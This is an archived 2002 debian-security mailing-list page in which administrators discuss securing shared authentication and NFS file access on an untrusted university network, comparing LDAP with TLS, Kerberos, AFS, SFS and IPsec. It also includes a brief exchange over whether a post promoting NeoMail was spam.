subscribe

2002-04-07 Thread fh ML 


--
  Florian Hinzmann private: [EMAIL PROTECTED]
Debian: [EMAIL PROTECTED]
PGP Key / ID: 1024D/B4071A65
Fingerprint : F9AB 00C1 3E3A 8125 DD3F  DF1C DF79 A374 B407 1A65


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: NFS, password transparency, and security

2002-04-07 Thread Tarjei Huse 

Hi,

Just thought I'd chip inn some support for LDAP. Also a kerberos
pointer:
www.bayour.com has a very good ldap+kerberos howto for debian written by
Turbo Fredrikson.

Also you should check out directory administrator for admining your
directory. A simple ldap client for administrating ldap users.

Now, the last thing: Does anyone have a URL for the SFS fileserver
system?

Tarjei


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: NFS, password transparency, and security

2002-04-07 Thread tony mancill 
On Sun, 7 Apr 2002, Luca Filipozzi wrote:

> I suspect that if all your boxes are running Debian that your life will
> be made easier by all the Debian kerberos packages.

This is an interesting thread, and this comment just gave me an idea.
What if you use FreeS/WAN (or really, any sort of IPsec)?  It can be set
up in a mode that's called "opportunistic encryption" that will use IPsec
for communication when it's available and allow other traffic to proceed
as normal.  In this way, you won't care if things like LDAP (or even NIS)
pass passwords around in cleartext, just as long as the workstation <->
file-server or authentication server connections are encrypted.  Although
I haven't done it, you should be able to run the server services bound to
a specific IP that is only accessible via clients that have successfully
IPsec-attached.

0.02,
tony

  [EMAIL PROTECTED] |  An ounce of perception,
http://www.debian.org  | a pound of obscure...
   |(Peart)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: NFS, password transparency, and security

2002-04-07 Thread Luca Filipozzi 

On Mon, Apr 08, 2002 at 08:23:17AM +0300, Sami Haahtinen wrote:
> On Sun, Apr 07, 2002 at 08:14:26PM -0700, Luca Filipozzi wrote:
> > Two choices (I like lists :) ):
> > 
> > (1) use libpam-ldap:
> 
> i recommend this.

I also recommend this.

> > (2) don't use libpam-ldap:
> > You don't have to use libpam-ldap.  You could just use
> > libnss-ldap and have the ldap server transfer the password
> > hashes to the workstations in the clear ... which is equivalent
> > to NIS.  You could also use libnss-ldap with SSL/TLS so that the
> > hashes are transferred more securely (equivalent to NIS+).
> 
> i don't recommend the above to anyone (do as i say, not as i do.. =) it
> will cause problems, you are forced to enter the database access
> password to the configuration, which you will then need to make readable
> to root, which in turn forces you to use nscd.

No, you don't.  You can set the ACLs in slapd.conf for userPassword to
'by * read'.  Sure, it's not a good choice.  That's why I said that it
is the equivalent of NIS.

> this also allows crackers to access your userbase, unlike libpam-ldap,
> where you are not forced to allow userpassword read access to the
> database. The cracker just needs to hack this machine, read the password
> from config and voila, ur nt3w0rk has been 0wn3d!

You don't need to put a binddn/bindpw into libnss-ldap if you make
userPassword readable by all.  libnss-ldap can bind anonymously.  It's
NIS-equivalent, however, so if the hashes are weak based on weak
passwords, a dictionary attack is possible (just like NIS).

Also, if you were to use a binddn/bindpw, you wouldn't use the
rootdn/rootpw.

Note for non-LDAP folk: userPassword is the hashed password, not the
cleartext password.

Luca

-- 
Luca Filipozzi, Debian Developer
[dpkg] We are the apt. You will be packaged. Comply.
gpgkey 5A827A2D - A149 97BD 188C 7F29 779E  09C1 3573 32C4 5A82 7A2D


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: NFS, password transparency, and security

2002-04-07 Thread Luca Filipozzi 
On Sun, Apr 07, 2002 at 10:04:01PM -0500, Rob VanFleet wrote:
> On Sun, Apr 07, 2002 at 07:39:43PM -0700, Luca Filipozzi wrote:
> > Two choices for authentication (passwd + shadow):
> > (1) Kerberos
> > Never used it. Can't advise you.
> 
> I've looked at Kerberos, but at least a cursory glance at leaves the
> impressions that it is ridiculously complicated to set up and requires
> multiple servers.  If someone has used it and can correct me, please do.

I suspect that if all your boxes are running Debian that your life will
be made easier by all the Debian kerberos packages.

> > (2) LDAP
> > Use LDAP (recompile --with-tls flag) + libpam-ldap + libnss-ldap to do
> > the equivalent of NIS but securely.
> 
> Without using SSL or Kerberos, would LDAP still be sending passwords
> across the net in plain text?

Two choices (I like lists :) ):

(1) use libpam-ldap:
libpam-ldap sends the password to the ldap server.  If not using
TLS/SSL, then it is sent in the clear.  By sending the password to
the server (rather than using a salt+hash), you can use whatever
hash algorithm you want on the server.  The server takes the
password and does the hashing locally.
So, you *must* use TLS/SSL if you are using libpam-ldap, imo.

(2) don't use libpam-ldap:
You 
You don't have to use libpam-ldap.  You could just use
libnss-ldap and have the ldap server transfer the password
hashes to the workstations in the clear ... which is equivalent
to NIS.  You could also use libnss-ldap with SSL/TLS so that the
hashes are transferred more securely (equivalent to NIS+).

Luca

-- 
Luca Filipozzi, Debian Developer
[dpkg] We are the apt. You will be packaged. Comply.
gpgkey 5A827A2D - A149 97BD 188C 7F29 779E  09C1 3573 32C4 5A82 7A2D


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: NFS, password transparency, and security

2002-04-07 Thread Sami Haahtinen 

On Sun, Apr 07, 2002 at 08:14:26PM -0700, Luca Filipozzi wrote:
> Two choices (I like lists :) ):
> 
> (1) use libpam-ldap:

i recommend this. Even though the current pam system is a pain to
modify.. if you modify one file and it gets updated in the package it
will nag about it.. you can't tell if it's a needed change or not,
luckily i have heard rumours about new design for the pam system and i'm
eagerly waiting for it to arrive =)

> (2) don't use libpam-ldap:
> You don't have to use libpam-ldap.  You could just use
> libnss-ldap and have the ldap server transfer the password
> hashes to the workstations in the clear ... which is equivalent
> to NIS.  You could also use libnss-ldap with SSL/TLS so that the
> hashes are transferred more securely (equivalent to NIS+).

i don't recommend the above to anyone (do as i say, not as i do.. =) it
will cause problems, you are forced to enter the database access
password to the configuration, which you will then need to make readable
to root, which in turn forces you to use nscd.

There is nothing wrong with nscd, it's just plain stupid.. if you have a
small database, there is no problem, but if you have a big database (max
cached entries +1) you might start running in to trouble. apparently the
caching mechanism is quite stupid and it can't just expire an entry
becuse someone needs a new one.. =(

this also allows crackers to access your userbase, unlike libpam-ldap,
where you are not forced to allow userpassword read access to the
database. The cracker just needs to hack this machine, read the password
from config and voila, ur nt3w0rk has been 0wn3d!


Sami

-- 
  -< Sami Haahtinen >-
  -[ Is it still a bug, if we have learned to live with it? ]-
-< 2209 3C53 D0FB 041C F7B1  F908 A9B6 F730 B83D 761C >-



msg06261/pgp0.pgp
Description: PGP signature

Re: NFS, password transparency, and security

2002-04-07 Thread Rob VanFleet 
On Sun, Apr 07, 2002 at 07:39:43PM -0700, Luca Filipozzi wrote:
> Two choices for authentication (passwd + shadow):
> (1) Kerberos
> Never used it. Can't advise you.

I've looked at Kerberos, but at least a cursory glance at leaves the
impressions that it is ridiculously complicated to set up and requires
multiple servers.  If someone has used it and can correct me, please do.

> (2) LDAP
> Use LDAP (recompile --with-tls flag) + libpam-ldap + libnss-ldap to do
> the equivalent of NIS but securely.

Without using SSL or Kerberos, would LDAP still be sending passwords
across the net in plain text?

[...]
> Several choices for file sharing:
> (1) NFS + iptables + tcpwrappers

Doing that right now.

> (2) SFS (see sfs-server sfs-client packages and www.fs.net)
> Requires users to authenticate against the file server, also.
> Consider using libpam-sfs (I'm rewriting it as we speak.)
> (3) OpenAFS (see openafs-fileserver + openafs-client)
> Also requirres users to authenticate against the file server, but
> when used in a Kerberos environment, you only have to logon once due
> to Kerberos' ticket-granting system.

Both of these sound very promising.  I had heard of AFS before, but not
SFS.  I'll have to research them further.  I'll probably have even more
questions after that though. :)

> Hope this (probably incomplete) list helps,

Immensely.  Thanks for the information.

Rob


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: NFS, password transparency, and security

2002-04-07 Thread Alvin Oga 

hi ya

why not do the following ???

make one machine be your primary NIS server...
- all passwds defined there...

all other machines uses the NIS server for passwd authentication
and turn on ssh logins ( ~/.shosts )  w/o checking passwd

use automounter for /n//directories
http://www.Linux-Consulting.com/AutoFS/autofs-HOWTO.html

add additional security as needed
- turn on tcp_wrappers
- use secure nfs/portmapper

- do NOT allow insecure operations in a secure environment
( no wireless stuff, no dchp stuff, no pop3, no telnet, no ftp )

and magically its just like sun-environment... sorta ...

c ya
alvin
http://www.Linux-Sec.net 

On Sun, 7 Apr 2002, Luca Filipozzi wrote:

> On Sun, Apr 07, 2002 at 09:02:56PM -0500, Rob VanFleet wrote:
> > I work for several University astronomers who basically want something
> > like what they're used to at other places: a pure sun shop, running
> > NIS and NFS.
> 
> Two choices for authentication (passwd + shadow):
> (1) Kerberos
> Never used it. Can't advise you.
> (2) LDAP
> Use LDAP (recompile --with-tls flag) + libpam-ldap + libnss-ldap to do
> the equivalent of NIS but securely.
> 
> Several choices for authorisation (pam_access.so):
> (1) local /etc/secuirty/access.conf listing all users
> (2) local /etc/secuirty/access.conf listing a group or netgroup
> - use local group file
> - use LDAP-distributed group or netgroup map
> 
> Several choices for file sharing:
> (1) NFS + iptables + tcpwrappers
> (2) SFS (see sfs-server sfs-client packages and www.fs.net)
> Requires users to authenticate against the file server, also.
> Consider using libpam-sfs (I'm rewriting it as we speak.)
> (3) OpenAFS (see openafs-fileserver + openafs-client)
> Also requirres users to authenticate against the file server, but
> when used in a Kerberos environment, you only have to logon once due
> to Kerberos' ticket-granting system.
> 
> Hope this (probably incomplete) list helps,
> 
> Luca
> 
> -- 
> Luca Filipozzi, Debian Developer
> [dpkg] We are the apt. You will be packaged. Comply.
> gpgkey 5A827A2D - A149 97BD 188C 7F29 779E  09C1 3573 32C4 5A82 7A2D
> 
> 
> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: NFS, password transparency, and security

2002-04-07 Thread Alan Shutko 
Rob VanFleet <[EMAIL PROTECTED]> writes:

> They basically want to log into any one machine within this group
> with the same password, and be able to access any disks they choose
> from any pariticular machine (within this group).

An AFS-based setup is used at many places to great effect, especially
on untrusted nets, but I don't know how bad setup is.  I suspect it's
evil.

-- 
Alan Shutko <[EMAIL PROTECTED]> - In a variety of flavors!
Ban the bomb.  Save the world for conventional warfare.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: NFS, password transparency, and security

2002-04-07 Thread Luca Filipozzi 

On Sun, Apr 07, 2002 at 09:22:12PM -0700, tony mancill wrote:
> What if you use FreeS/WAN (or really, any sort of IPsec)?  It can be set
> up in a mode that's called "opportunistic encryption" that will use IPsec
> for communication when it's available and allow other traffic to proceed
> as normal.  In this way, you won't care if things like LDAP (or even NIS)
> pass passwords around in cleartext, just as long as the workstation <->
> file-server or authentication server connections are encrypted.  Although
> I haven't done it, you should be able to run the server services bound to
> a specific IP that is only accessible via clients that have successfully
> IPsec-attached.

For the NFS traffic, opportunistic encryption seems like a very
intersting idea.

There's no way I would use libpam-ldap without knowing *for certain*
that it was going over a TLS/SSL connection, however.

Luca

-- 
Luca Filipozzi, Debian Developer
[dpkg] We are the apt. You will be packaged. Comply.
gpgkey 5A827A2D - A149 97BD 188C 7F29 779E  09C1 3573 32C4 5A82 7A2D


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: NFS, password transparency, and security

2002-04-07 Thread Luca Filipozzi 
On Sun, Apr 07, 2002 at 09:02:56PM -0500, Rob VanFleet wrote:
> I work for several University astronomers who basically want something
> like what they're used to at other places: a pure sun shop, running
> NIS and NFS.

Two choices for authentication (passwd + shadow):
(1) Kerberos
Never used it. Can't advise you.
(2) LDAP
Use LDAP (recompile --with-tls flag) + libpam-ldap + libnss-ldap to do
the equivalent of NIS but securely.

Several choices for authorisation (pam_access.so):
(1) local /etc/secuirty/access.conf listing all users
(2) local /etc/secuirty/access.conf listing a group or netgroup
- use local group file
- use LDAP-distributed group or netgroup map

Several choices for file sharing:
(1) NFS + iptables + tcpwrappers
(2) SFS (see sfs-server sfs-client packages and www.fs.net)
Requires users to authenticate against the file server, also.
Consider using libpam-sfs (I'm rewriting it as we speak.)
(3) OpenAFS (see openafs-fileserver + openafs-client)
Also requirres users to authenticate against the file server, but
when used in a Kerberos environment, you only have to logon once due
to Kerberos' ticket-granting system.

Hope this (probably incomplete) list helps,

Luca

-- 
Luca Filipozzi, Debian Developer
[dpkg] We are the apt. You will be packaged. Comply.
gpgkey 5A827A2D - A149 97BD 188C 7F29 779E  09C1 3573 32C4 5A82 7A2D


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

NFS, password transparency, and security

2002-04-07 Thread Rob VanFleet 
I have a situation where my superiors are leaning heavily on me to make
life more convenient for them by having total availability of data from
a group of machines.  They basically want to log into any one machine
within this group with the same password, and be able to access any
disks they choose from any pariticular machine (within this group).

What makes me nervous is that is that I have little to no control over
the network.  The particular setup at our university is that every
single ethernet drop has a unique and world accessible IP (most of this
is done with DHCP, so most change, but the machines that have purposes,
like the afformentioned group - don't).  These machines also share
subnets with machines I don't control, which makes using non-encrypted
authentication even more dangerous than usual - it is a switched
network, but that doesn't protect against much at all.  The best I can
do to keep these machines from being affected from the world is to have
iptables firewalls set up on each of them, basically denying everything
including pings from outside specified subnets.  This is a less than
desirable solution, not to mention the scalability issues inherent with
every single machine having its own set of firewall rules.

What I am curious to know what is the best way possible to implement
what they want and to do so as securely as possible.  I work for several
University astronomers who basically want something like what they're
used to at other places: a pure sun shop, running NIS and NFS.  While
I'm aware that this can be done just as easily with Linux, I am going to
assume that many places who run NIS/NFS do so inside a strictly internal
network, not on several Machines that have external IPs to themselves on
subnets shared by student lab machines and other untrusted nodes.

What I have done so far is just have a few users's home directories
mounted over NFS on a central machine, making sure that they have the
same UIDs across the board.  I am rapidly realizing that this solution
does not scale well, plus it does not provide a full solution.

I apologize in advance for any rambling or over-generalizations.  Please
add any advice or corrections you may have.


Thanks,
Rob


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: NFS, password transparency, and security

2002-04-07 Thread tony mancill 

On Sun, 7 Apr 2002, Luca Filipozzi wrote:

> I suspect that if all your boxes are running Debian that your life will
> be made easier by all the Debian kerberos packages.

This is an interesting thread, and this comment just gave me an idea.
What if you use FreeS/WAN (or really, any sort of IPsec)?  It can be set
up in a mode that's called "opportunistic encryption" that will use IPsec
for communication when it's available and allow other traffic to proceed
as normal.  In this way, you won't care if things like LDAP (or even NIS)
pass passwords around in cleartext, just as long as the workstation <->
file-server or authentication server connections are encrypted.  Although
I haven't done it, you should be able to run the server services bound to
a specific IP that is only accessible via clients that have successfully
IPsec-attached.

0.02,
tony

  [EMAIL PROTECTED] |  An ounce of perception,
http://www.debian.org  | a pound of obscure...
   |(Peart)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: NEOMAIL - as big kev in OZ would say, IM EXCITED !

2002-04-07 Thread Marcel Welschbillig 

Hi,

Just wanted to make it clear the the email i sent about Neomail was 
purely to let other people know about a program that i thought was worth 
mentioning, it had nothing to do with Ernie Miller and was not intended 
to be SPAM.


Im sorry if i have caused you problems Ernie this is the last thing i 
wanted to do.


In future i will keep my discoveries to my self !

Marcel

Ernie Miller wrote:


Andrew,

The NeoMail project's only member is me.  I have nothing to do with this
guy, and though I'm happy he's happy with NeoMail, this is clearly
inappropriate behavior.  I'm copying this mail to the perpetrator address as
listed in your forward, so he understands that I don't encourage this type
of behavior, but I don't have any affiliation with him.  I'd have been
plenty happy if NeoMail hadn't become as popular as it is, and would
certainly not be advertising, as I can't really handle the NeoMail-related
e-mail I receive now as it is.

When you say "further damage," you imply my reputation is already
damaged in the open-source community as-is, which I don't believe it to
be -- unless someone were to mistake these mails as being originated by or
condoned by me, and you are referring to this incident.   Hence my response
to the list, hopefully clearing my name since you've opted to submit the
accusation to the list as well.

Wait a second... upon rereading this mail I did in fact notice a mail in
my inbox this morning from someone in Australia ranting about how much he
liked NeoMail and that he had wasted money on a commercial solution prior to
finding it.  The mail is at home, but I'd wager this is the same guy.  In
any case, I'm sorry that he got a bit overexcited, and I hope everyone
understands I had nothing to do with it.

If you need anything further from me feel free to reply to this address.

Thanks!

Ernie Miller


- Original Message -
From: "Andrew Lau" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Cc: "Debian-Security List" 
Sent: Friday, April 05, 2002 7:55 AM
Subject: Re: NEOMAIL - as big kev in OZ would say, IM EXCITED !

Dear Ernie Miller,
 I'm forwarding you this piece of spam that was recently sent
to debian-security mailing list. It is also archived at
. Being
unable to find a Marcel Welschbillig listed on your SourceForge
project page, I have decided against forwarding this to SourceForge
abuse staff in the present time seeing as I am unable to determine
whether this spam was authourised or not by you anyone acting on
behalf of the NeoMail project. However, this piece of spam has been
previously listed on the Razor  webiste
as spam which would leave me to believe that this is not a one-off
incident. Please take action to stop further spam if you do know this
person or else it unsolicted advertising promoting your project will
only further damage your reputation among the opensource community.

Yours sincerely,
Andrew "Netsnipe" Lau

- Forwarded message from Marcel Welschbillig
<[EMAIL PROTECTED]> -

Received: from localhost ([127.0.0.1] ident=netsnipe)
 by espresso with esmtp (Exim 3.35 #1 (Debian))
 id 16tNxs-0001v9-00
 for <[EMAIL PROTECTED]>; Fri, 05 Apr 2002 17:16:52 +1000
Received: from pop3.iprimus.com.au [203.134.64.85]
 by localhost with IMAP (fetchmail-5.9.11)
 for [EMAIL PROTECTED] (single-drop); Fri, 05 Apr 2002 17:16:52 +1000 (EST)
Received: from mx01.iprimus.com.au ([203.134.64.90]) by loc01.iprimus.com.au
with Microsoft SMTPSVC(5.5.1877.647.64);
  Fri, 5 Apr 2002 11:58:04 +1000
Received: from murphy.debian.org ([65.125.64.134]) by mx01.iprimus.com.au
with Microsoft SMTPSVC(5.0.2195.4617);
  Fri, 5 Apr 2002 11:58:03 +1000
Received: (qmail 15663 invoked by uid 38); 5 Apr 2002 01:56:55 -
X-Envelope-Sender: [EMAIL PROTECTED]
Received: (qmail 15618 invoked from network); 5 Apr 2002 01:56:52 -
Received: from unknown (HELO vager2.comdek.net.au) ([EMAIL PROTECTED])
  by murphy.debian.org with SMTP; 5 Apr 2002 01:56:52 -
Received: from comdek.net.au ([EMAIL PROTECTED] [127.0.0.1])
 by vager2.comdek.net.au (8.9.3/8.9.3/Debian 8.9.3-21) with ESMTP id
JAA03755
 for ; Fri, 5 Apr 2002 09:42:12 +0800
X-Authentication-Warning: vager2.comdek.net.au: Host [EMAIL PROTECTED]
[127.0.0.1] claimed to be comdek.net.au
Message-ID: <[EMAIL PROTECTED]>
Date: Fri, 05 Apr 2002 09:42:11 +0800
From: Marcel Welschbillig <[EMAIL PROTECTED]>
User-Agent: Mozilla/5.0 (X11; U; Linux 2.4.4 i686; en-US; m18)
Gecko/20001107 Netscape6/6.0
X-Accept-Language: en
MIME-Version: 1.0
To: Debian-Security List 
Subject: NEOMAIL - as big kev in OZ would say, IM EXCITED !
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Resent-Message-ID: <[EMAIL PROTECTED]>
Resent-From: debian-security@lists.debian.org
X-Mailing-List:  archive/latest/6720
X-Loop: debian-security@lists.debian.org
List-Post:

Re: NFS, password transparency, and security

2002-04-07 Thread Luca Filipozzi 

On Sun, Apr 07, 2002 at 10:04:01PM -0500, Rob VanFleet wrote:
> On Sun, Apr 07, 2002 at 07:39:43PM -0700, Luca Filipozzi wrote:
> > Two choices for authentication (passwd + shadow):
> > (1) Kerberos
> > Never used it. Can't advise you.
> 
> I've looked at Kerberos, but at least a cursory glance at leaves the
> impressions that it is ridiculously complicated to set up and requires
> multiple servers.  If someone has used it and can correct me, please do.

I suspect that if all your boxes are running Debian that your life will
be made easier by all the Debian kerberos packages.

> > (2) LDAP
> > Use LDAP (recompile --with-tls flag) + libpam-ldap + libnss-ldap to do
> > the equivalent of NIS but securely.
> 
> Without using SSL or Kerberos, would LDAP still be sending passwords
> across the net in plain text?

Two choices (I like lists :) ):

(1) use libpam-ldap:
libpam-ldap sends the password to the ldap server.  If not using
TLS/SSL, then it is sent in the clear.  By sending the password to
the server (rather than using a salt+hash), you can use whatever
hash algorithm you want on the server.  The server takes the
password and does the hashing locally.
So, you *must* use TLS/SSL if you are using libpam-ldap, imo.

(2) don't use libpam-ldap:
You 
You don't have to use libpam-ldap.  You could just use
libnss-ldap and have the ldap server transfer the password
hashes to the workstations in the clear ... which is equivalent
to NIS.  You could also use libnss-ldap with SSL/TLS so that the
hashes are transferred more securely (equivalent to NIS+).

Luca

-- 
Luca Filipozzi, Debian Developer
[dpkg] We are the apt. You will be packaged. Comply.
gpgkey 5A827A2D - A149 97BD 188C 7F29 779E  09C1 3573 32C4 5A82 7A2D


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: NFS, password transparency, and security

2002-04-07 Thread Rob VanFleet 

On Sun, Apr 07, 2002 at 07:39:43PM -0700, Luca Filipozzi wrote:
> Two choices for authentication (passwd + shadow):
> (1) Kerberos
> Never used it. Can't advise you.

I've looked at Kerberos, but at least a cursory glance at leaves the
impressions that it is ridiculously complicated to set up and requires
multiple servers.  If someone has used it and can correct me, please do.

> (2) LDAP
> Use LDAP (recompile --with-tls flag) + libpam-ldap + libnss-ldap to do
> the equivalent of NIS but securely.

Without using SSL or Kerberos, would LDAP still be sending passwords
across the net in plain text?

[...]
> Several choices for file sharing:
> (1) NFS + iptables + tcpwrappers

Doing that right now.

> (2) SFS (see sfs-server sfs-client packages and www.fs.net)
> Requires users to authenticate against the file server, also.
> Consider using libpam-sfs (I'm rewriting it as we speak.)
> (3) OpenAFS (see openafs-fileserver + openafs-client)
> Also requirres users to authenticate against the file server, but
> when used in a Kerberos environment, you only have to logon once due
> to Kerberos' ticket-granting system.

Both of these sound very promising.  I had heard of AFS before, but not
SFS.  I'll have to research them further.  I'll probably have even more
questions after that though. :)

> Hope this (probably incomplete) list helps,

Immensely.  Thanks for the information.

Rob


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: NFS, password transparency, and security

2002-04-07 Thread Alvin Oga 


hi ya

why not do the following ???

make one machine be your primary NIS server...
- all passwds defined there...

all other machines uses the NIS server for passwd authentication
and turn on ssh logins ( ~/.shosts )  w/o checking passwd

use automounter for /n//directories
http://www.Linux-Consulting.com/AutoFS/autofs-HOWTO.html

add additional security as needed
- turn on tcp_wrappers
- use secure nfs/portmapper

- do NOT allow insecure operations in a secure environment
( no wireless stuff, no dchp stuff, no pop3, no telnet, no ftp )

and magically its just like sun-environment... sorta ...

c ya
alvin
http://www.Linux-Sec.net 

On Sun, 7 Apr 2002, Luca Filipozzi wrote:

> On Sun, Apr 07, 2002 at 09:02:56PM -0500, Rob VanFleet wrote:
> > I work for several University astronomers who basically want something
> > like what they're used to at other places: a pure sun shop, running
> > NIS and NFS.
> 
> Two choices for authentication (passwd + shadow):
> (1) Kerberos
> Never used it. Can't advise you.
> (2) LDAP
> Use LDAP (recompile --with-tls flag) + libpam-ldap + libnss-ldap to do
> the equivalent of NIS but securely.
> 
> Several choices for authorisation (pam_access.so):
> (1) local /etc/secuirty/access.conf listing all users
> (2) local /etc/secuirty/access.conf listing a group or netgroup
> - use local group file
> - use LDAP-distributed group or netgroup map
> 
> Several choices for file sharing:
> (1) NFS + iptables + tcpwrappers
> (2) SFS (see sfs-server sfs-client packages and www.fs.net)
> Requires users to authenticate against the file server, also.
> Consider using libpam-sfs (I'm rewriting it as we speak.)
> (3) OpenAFS (see openafs-fileserver + openafs-client)
> Also requirres users to authenticate against the file server, but
> when used in a Kerberos environment, you only have to logon once due
> to Kerberos' ticket-granting system.
> 
> Hope this (probably incomplete) list helps,
> 
> Luca
> 
> -- 
> Luca Filipozzi, Debian Developer
> [dpkg] We are the apt. You will be packaged. Comply.
> gpgkey 5A827A2D - A149 97BD 188C 7F29 779E  09C1 3573 32C4 5A82 7A2D
> 
> 
> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: NFS, password transparency, and security

2002-04-07 Thread Alan Shutko 

Rob VanFleet <[EMAIL PROTECTED]> writes:

> They basically want to log into any one machine within this group
> with the same password, and be able to access any disks they choose
> from any pariticular machine (within this group).

An AFS-based setup is used at many places to great effect, especially
on untrusted nets, but I don't know how bad setup is.  I suspect it's
evil.

-- 
Alan Shutko <[EMAIL PROTECTED]> - In a variety of flavors!
Ban the bomb.  Save the world for conventional warfare.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: NFS, password transparency, and security

2002-04-07 Thread Luca Filipozzi 

On Sun, Apr 07, 2002 at 09:02:56PM -0500, Rob VanFleet wrote:
> I work for several University astronomers who basically want something
> like what they're used to at other places: a pure sun shop, running
> NIS and NFS.

Two choices for authentication (passwd + shadow):
(1) Kerberos
Never used it. Can't advise you.
(2) LDAP
Use LDAP (recompile --with-tls flag) + libpam-ldap + libnss-ldap to do
the equivalent of NIS but securely.

Several choices for authorisation (pam_access.so):
(1) local /etc/secuirty/access.conf listing all users
(2) local /etc/secuirty/access.conf listing a group or netgroup
- use local group file
- use LDAP-distributed group or netgroup map

Several choices for file sharing:
(1) NFS + iptables + tcpwrappers
(2) SFS (see sfs-server sfs-client packages and www.fs.net)
Requires users to authenticate against the file server, also.
Consider using libpam-sfs (I'm rewriting it as we speak.)
(3) OpenAFS (see openafs-fileserver + openafs-client)
Also requirres users to authenticate against the file server, but
when used in a Kerberos environment, you only have to logon once due
to Kerberos' ticket-granting system.

Hope this (probably incomplete) list helps,

Luca

-- 
Luca Filipozzi, Debian Developer
[dpkg] We are the apt. You will be packaged. Comply.
gpgkey 5A827A2D - A149 97BD 188C 7F29 779E  09C1 3573 32C4 5A82 7A2D


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

NFS, password transparency, and security

2002-04-07 Thread Rob VanFleet 

I have a situation where my superiors are leaning heavily on me to make
life more convenient for them by having total availability of data from
a group of machines.  They basically want to log into any one machine
within this group with the same password, and be able to access any
disks they choose from any pariticular machine (within this group).

What makes me nervous is that is that I have little to no control over
the network.  The particular setup at our university is that every
single ethernet drop has a unique and world accessible IP (most of this
is done with DHCP, so most change, but the machines that have purposes,
like the afformentioned group - don't).  These machines also share
subnets with machines I don't control, which makes using non-encrypted
authentication even more dangerous than usual - it is a switched
network, but that doesn't protect against much at all.  The best I can
do to keep these machines from being affected from the world is to have
iptables firewalls set up on each of them, basically denying everything
including pings from outside specified subnets.  This is a less than
desirable solution, not to mention the scalability issues inherent with
every single machine having its own set of firewall rules.

What I am curious to know what is the best way possible to implement
what they want and to do so as securely as possible.  I work for several
University astronomers who basically want something like what they're
used to at other places: a pure sun shop, running NIS and NFS.  While
I'm aware that this can be done just as easily with Linux, I am going to
assume that many places who run NIS/NFS do so inside a strictly internal
network, not on several Machines that have external IPs to themselves on
subnets shared by student lab machines and other untrusted nodes.

What I have done so far is just have a few users's home directories
mounted over NFS on a central machine, making sure that they have the
same UIDs across the board.  I am rapidly realizing that this solution
does not scale well, plus it does not provide a full solution.

I apologize in advance for any rambling or over-generalizations.  Please
add any advice or corrections you may have.


Thanks,
Rob


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: NEOMAIL - as big kev in OZ would say, IM EXCITED !

2002-04-07 Thread Marcel Welschbillig 

Hi,

Just wanted to make it clear the the email i sent about Neomail was 
purely to let other people know about a program that i thought was worth 
mentioning, it had nothing to do with Ernie Miller and was not intended 
to be SPAM.

Im sorry if i have caused you problems Ernie this is the last thing i 
wanted to do.

In future i will keep my discoveries to my self !

Marcel

Ernie Miller wrote:

> Andrew,
> 
> The NeoMail project's only member is me.  I have nothing to do with this
> guy, and though I'm happy he's happy with NeoMail, this is clearly
> inappropriate behavior.  I'm copying this mail to the perpetrator address as
> listed in your forward, so he understands that I don't encourage this type
> of behavior, but I don't have any affiliation with him.  I'd have been
> plenty happy if NeoMail hadn't become as popular as it is, and would
> certainly not be advertising, as I can't really handle the NeoMail-related
> e-mail I receive now as it is.
> 
> When you say "further damage," you imply my reputation is already
> damaged in the open-source community as-is, which I don't believe it to
> be -- unless someone were to mistake these mails as being originated by or
> condoned by me, and you are referring to this incident.   Hence my response
> to the list, hopefully clearing my name since you've opted to submit the
> accusation to the list as well.
> 
> Wait a second... upon rereading this mail I did in fact notice a mail in
> my inbox this morning from someone in Australia ranting about how much he
> liked NeoMail and that he had wasted money on a commercial solution prior to
> finding it.  The mail is at home, but I'd wager this is the same guy.  In
